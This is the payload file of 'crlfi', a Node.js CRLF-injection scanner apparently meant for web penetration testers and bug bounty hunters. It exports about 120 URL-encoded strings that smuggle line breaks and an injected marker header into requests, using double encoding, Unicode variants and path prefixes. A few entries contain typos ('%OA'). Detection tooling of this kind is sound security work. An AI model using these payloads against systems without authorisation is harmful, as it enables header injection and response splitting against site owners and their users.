#!/usr/bin/env node

/**
 * crlfi
 * CRLF Bug scanner for WebPentesters and Bugbounty Hunters
 *
 * @author karthikeyan V (karthithehacker) <https://karthithehacker.com>
 */


exports.payloads = [
	
	"%0Acrlfi:karthithehacker" ,
	"%0A%20crlfi:karthithehacker" ,
	"%20%0Acrlfi:karthithehacker" ,
	"%23%OAcrlfi:karthithehacker" ,
	"%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"%E5%98%8A%E5%98%8D%0Acrlfi:karthithehacker" ,
	"%3F%0Acrlfi:karthithehacker" ,
	"crlf%0Acrlfi:karthithehacker" ,
	"crlf%0A%20crlfi:karthithehacker" ,
	"crlf%20%0Acrlfi:karthithehacker" ,
	"crlf%23%OAcrlfi:karthithehacker" ,
	"crlf%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"crlf%E5%98%8A%E5%98%8D%0Acrlfi:karthithehacker" ,
	"crlf%3F%0Acrlfi:karthithehacker" ,
	"%0Dcrlfi:karthithehacker" ,
	"%0D%20crlfi:karthithehacker" ,
	"%20%0Dcrlfi:karthithehacker" ,
	"%23%0Dcrlfi:karthithehacker" ,
	"%23%0Acrlfi:karthithehacker" ,
	"%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"%E5%98%8A%E5%98%8D%0Dcrlfi:karthithehacker" ,
	"%3F%0Dcrlfi:karthithehacker" ,
	"crlf%0Dcrlfi:karthithehacker" ,
	"crlf%0D%20crlfi:karthithehacker" ,
	"crlf%20%0Dcrlfi:karthithehacker" ,
	"crlf%23%0Dcrlfi:karthithehacker" ,
	"crlf%23%0Acrlfi:karthithehacker" ,
	"crlf%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"crlf%E5%98%8A%E5%98%8D%0Dcrlfi:karthithehacker" ,
	"crlf%3F%0Dcrlfi:karthithehacker" ,
	"%0D%0Acrlfi:karthithehacker" ,
	"%0D%0A%20crlfi:karthithehacker" ,
	"%20%0D%0Acrlfi:karthithehacker" ,
	"%23%0D%0Acrlfi:karthithehacker" ,
	"\\r\\ncrlfi:karthithehacker" ,
	" \\r\\n crlfi:karthithehacker" ,
	"\\r\\n crlfi:karthithehacker" ,
	"%5cr%5cncrlfi:karthithehacker" ,
	"%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"%E5%98%8A%E5%98%8D%0D%0Acrlfi:karthithehacker" ,
	"%3F%0D%0Acrlfi:karthithehacker" ,
	"crlf%0D%0Acrlfi:karthithehacker" ,
	"crlf%0D%0A%20crlfi:karthithehacker" ,
	"crlf%20%0D%0Acrlfi:karthithehacker" ,
	"crlf%23%0D%0Acrlfi:karthithehacker" ,
	"crlf\\r\\ncrlfi:karthithehacker" ,
	"crlf%5cr%5cncrlfi:karthithehacker" ,
	"crlf%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"crlf%E5%98%8A%E5%98%8D%0D%0Acrlfi:karthithehacker" ,
	"crlf%3F%0D%0Acrlfi:karthithehacker" ,
	"%0D%0A%09crlfi:karthithehacker" ,
	"crlf%0D%0A%09crlfi:karthithehacker" ,
	"%250Acrlfi:karthithehacker" ,
	"%25250Acrlfi:karthithehacker" ,
	"%%0A0Acrlfi:karthithehacker" ,
	"%25%30Acrlfi:karthithehacker" ,
	"%25%30%61crlfi:karthithehacker" ,
	"%u000Acrlfi:karthithehacker" ,
	"//www.karthithehacker.com/%2F%2E%2E%0D%0Acrlfi:karthithehacker" ,
	"/www.karthithehacker.com/%2E%2E%2F%0D%0Acrlfi:karthithehacker" ,
	"/karthithehacker.com/%2F..%0D%0Acrlfi:karthithehacker" ,
	"/%0Acrlfi:karthithehacker" ,
	"/%0A%20crlfi:karthithehacker" ,
	"/%20%0Acrlfi:karthithehacker" ,
	"/%23%OAcrlfi:karthithehacker" ,
	"/%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"/%E5%98%8A%E5%98%8D%0Acrlfi:karthithehacker" ,
	"/%3F%0Acrlfi:karthithehacker" ,
	"/crlf%0Acrlfi:karthithehacker" ,
	"/crlf%0A%20crlfi:karthithehacker" ,
	"/crlf%20%0Acrlfi:karthithehacker" ,
	"/crlf%23%OAcrlfi:karthithehacker" ,
	"/crlf%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"/crlf%E5%98%8A%E5%98%8D%0Acrlfi:karthithehacker" ,
	"/crlf%3F%0Acrlfi:karthithehacker" ,
	"/%0Dcrlfi:karthithehacker" ,
	"/%0D%20crlfi:karthithehacker" ,
	"/%20%0Dcrlfi:karthithehacker" ,
	"/%23%0Dcrlfi:karthithehacker" ,
	"/%23%0Acrlfi:karthithehacker" ,
	"/%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"/%E5%98%8A%E5%98%8D%0Dcrlfi:karthithehacker" ,
	"/%3F%0Dcrlfi:karthithehacker" ,
	"/crlf%0Dcrlfi:karthithehacker" ,
	"/crlf%0D%20crlfi:karthithehacker" ,
	"/crlf%20%0Dcrlfi:karthithehacker" ,
	"/crlf%23%0Dcrlfi:karthithehacker" ,
	"/crlf%23%0Acrlfi:karthithehacker" ,
	"/crlf%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"/crlf%E5%98%8A%E5%98%8D%0Dcrlfi:karthithehacker" ,
	"/crlf%3F%0Dcrlfi:karthithehacker" ,
	"/%0D%0Acrlfi:karthithehacker" ,
	"/%0D%0A%20crlfi:karthithehacker" ,
	"/%20%0D%0Acrlfi:karthithehacker" ,
	"/%23%0D%0Acrlfi:karthithehacker" ,
	"/\\r\\ncrlfi:karthithehacker" ,
	"/ \\r\\n crlfi:karthithehacker" ,
	"/\\r\\n crlfi:karthithehacker" ,
	"/%5cr%5cncrlfi:karthithehacker" ,
	"/%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"/%E5%98%8A%E5%98%8D%0D%0Acrlfi:karthithehacker" ,
	"/%3F%0D%0Acrlfi:karthithehacker" ,
	"/crlf%0D%0Acrlfi:karthithehacker" ,
	"/crlf%0D%0A%20crlfi:karthithehacker" ,
	"/crlf%20%0D%0Acrlfi:karthithehacker" ,
	"/crlf%23%0D%0Acrlfi:karthithehacker" ,
	"/crlf\\r\\ncrlfi:karthithehacker" ,
	"/crlf%5cr%5cncrlfi:karthithehacker" ,
	"/crlf%E5%98%8A%E5%98%8Dcrlfi:karthithehacker" ,
	"/crlf%E5%98%8A%E5%98%8D%0D%0Acrlfi:karthithehacker" ,
	"/crlf%3F%0D%0Acrlfi:karthithehacker" ,
	"/%0D%0A%09crlfi:karthithehacker" ,
	"/crlf%0D%0A%09crlfi:karthithehacker" ,
	"/%250Acrlfi:karthithehacker" ,
	"/%25250Acrlfi:karthithehacker" ,
	"/%%0A0Acrlfi:karthithehacker" ,
	"/%25%30Acrlfi:karthithehacker" ,
	"/%25%30%61crlfi:karthithehacker" ,
	"/%u000Acrlfi:karthithehacker" ,
	"//www.karthithehacker.com/%2F%2E%2E%0D%0Acrlfi:karthithehacker" ,
	"/www.karthithehacker.com/%2E%2E%2F%0D%0Acrlfi:karthithehacker" ,
	"/karthithehacker.com/%2F..%0D%0Acrlfi:karthithehacker" 

	]